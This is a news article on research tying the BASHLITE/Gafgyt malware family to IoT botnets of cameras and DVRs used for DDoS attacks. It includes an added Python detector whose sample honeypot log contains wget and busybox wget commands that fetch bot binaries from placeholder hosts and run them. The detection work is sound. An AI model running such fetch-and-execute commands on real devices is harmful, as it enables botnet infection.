More than one million consumer web-connected video cameras and DVRs are compromised by bot herders who use the devices for DDoS attacks, researchers say.
According to Level 3 Threat Research Labs, a small malware family that goes by the names Lizkebab, BASHLITE, Torlus and Gafgyt is behind a web of botnets carrying out the attacks.
“This research shocked us,” said Dale Drew, chief security officer at Level 3 Communications. “We picked fairly well-known and average botnets and challenged ourselves to find as many interesting things as we could. At a high level we were surprised. When we looked at BASHLITE malware, for example, we found it was tied to botnets far more organized and structured than we had previously thought.”
According to researchers, BASHLITE was responsible for a sliding scale of command and control servers and botnets that varied in size by the week. In July, they tracked C2s linked to the malware family communicating with only 74 bots. Later, researchers observed the malware family communicating with as many as 120,000 bots. A closer analysis of the BASHLITE malware, Drew said, led to a large botnet with nearly 100 command-and-control servers. Some C2s exceeded 100 DDoS attacks a day with 75 percent of attacks lasting five minutes or less.
“What we learned is there is a false sense that some botnets that appear small don’t have the scope and scale to do much damage,” Drew said. “People have looked at these botnets and because they are very compartmentalized, they have only seen parts of the botnet and not the entire connected picture.”
Behind the malware push are hacking groups such as Lizard Squad and Poodle Corp, which are increasingly targeting IoT devices to build botnets, conduct DDoS attacks and offer DDoS-as-a-Service, the firm wrote in a technical write-up on its research.
“After the attacker has gained access to the device, their tools do not bother to identify the architecture of the device they have compromised. Instead, they immediately execute both the ‘busybox wget’ and ‘wget’ commands to retrieve their DDoS bot payloads. Then they attempt to run multiple versions of the malware compiled for different architectures, until one executes,” the report reads.
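The behaviour the report describes can be turned into a session-level detection check. The following is an added example, not code from Level 3 or Flashpoint: it flags sessions that use both wget variants and then run several of the files they downloaded. The log format (one `<session-id> <command>` per line), the addresses, the file names and the `min_executed` threshold are all assumptions.

```python
import os
import re
from collections import defaultdict

# Constructed sample: "<session-id> <command>" per line, as a telnet honeypot
# might log it. Addresses and file names are placeholders, not real indicators.
SAMPLE_LOG = """\
s1 busybox wget http://192.0.2.10/bot.mips
s1 wget http://192.0.2.10/bot.mips
s1 chmod +x bot.mips
s1 ./bot.mips
s1 wget http://192.0.2.10/bot.arm
s1 ./bot.arm
s2 wget http://198.51.100.7/firmware.bin
s2 sha256sum firmware.bin
"""

WGET = re.compile(r"^(busybox\s+)?wget\s+(.+)$")

def analyze(log_text, min_executed=2):
    """Flag sessions that use both wget variants, then run several downloads."""
    state = defaultdict(lambda: {"tools": set(), "files": set(), "ran": set()})
    for line in log_text.splitlines():
        sid, _, cmd = line.strip().partition(" ")
        if not cmd.strip():
            continue
        s = state[sid]
        m = WGET.match(cmd.strip())
        if m:
            s["tools"].add("busybox wget" if m.group(1) else "wget")
            args = m.group(2).split()
            # Saved name: the -O argument if given, else the URL's last path part.
            if "-O" in args[:-1]:
                target = args[args.index("-O") + 1]
            else:
                target = next((a for a in args if "://" in a), "")
            name = os.path.basename(target.rstrip("/"))
            if name:
                s["files"].add(name)
            continue
        # Execution: the command word is a file this session downloaded earlier.
        word = os.path.basename(cmd.split()[0])
        if word in s["files"]:
            s["ran"].add(word)
    # min_executed is an assumed threshold: at least two builds were tried.
    return sorted(sid for sid, s in state.items()
                  if s["tools"] == {"busybox wget", "wget"}
                  and len(s["ran"]) >= min_executed)
```

Calling `analyze(SAMPLE_LOG)` returns the flagged session ids. Files are matched by base name only, so treat a hit as a lead for review rather than a verdict.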
Of the one million infected endpoint devices, 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers and less than 1 percent were tied to Linux servers. “This represents a drastic shift in the composition of botnets compared to the compromised server- and home router-based DDoS botnets we’ve seen in the past,” the researchers said.
Of the bots used in attacks, the majority were located in Taiwan, Brazil and Colombia. Security camera DVRs were a prime target of attackers, researchers say, because they are considered low-hanging fruit. Many come configured with telnet and web interfaces enabled and use default credentials. “Most of these devices run some flavor of embedded Linux. When combined with the bandwidth required to stream video, they provide a potent class of DDoS bots,” the firm said.
Flashpoint, which helped Level 3 with the BASHLITE research, said the firm has been tracking 200 C2s tied to this malware family over the past several months. In contrast with more sophisticated malware, the C2 IPs associated with the campaign are hard-coded into the malware and often specify only a single IP address, making them easy targets for security researchers.
“This does not appear to be a concern for these bot herders, as it is easy to create a new C2 and re-compromise their bots,” researchers wrote.
As TCP attacks have decreased in popularity over the last month, the majority of the attacks launched are simple UDP and TCP floods, researchers note.
“While this malware supports spoofing of source addresses, we rarely see it employed. Some variants also support HTTP attacks, which make full connections to the victim webservers,” the report stated.
The majority of infected endpoints are tied to just a handful of companies that have implemented sloppy or nonexistent security standards into their IoT devices, Level 3 said. Singled out in the report was Dahua Technology – one of three vendors whose devices were attacked by the malware. Drew claims the company is preparing a patch for the flaw and will deploy it shortly.
This is also not the first time internet-accessible video cameras have been leveraged in a botnet attack. Earlier this year a much smaller botnet that consisted of 25,000 internet-enabled closed circuit TV devices was spotted by researchers at Sucuri. Another DDoS botnet leveraging 1,300 infected webcams was found by Arbor’s Security Engineering and Response Team (ASERT) earlier this year as well.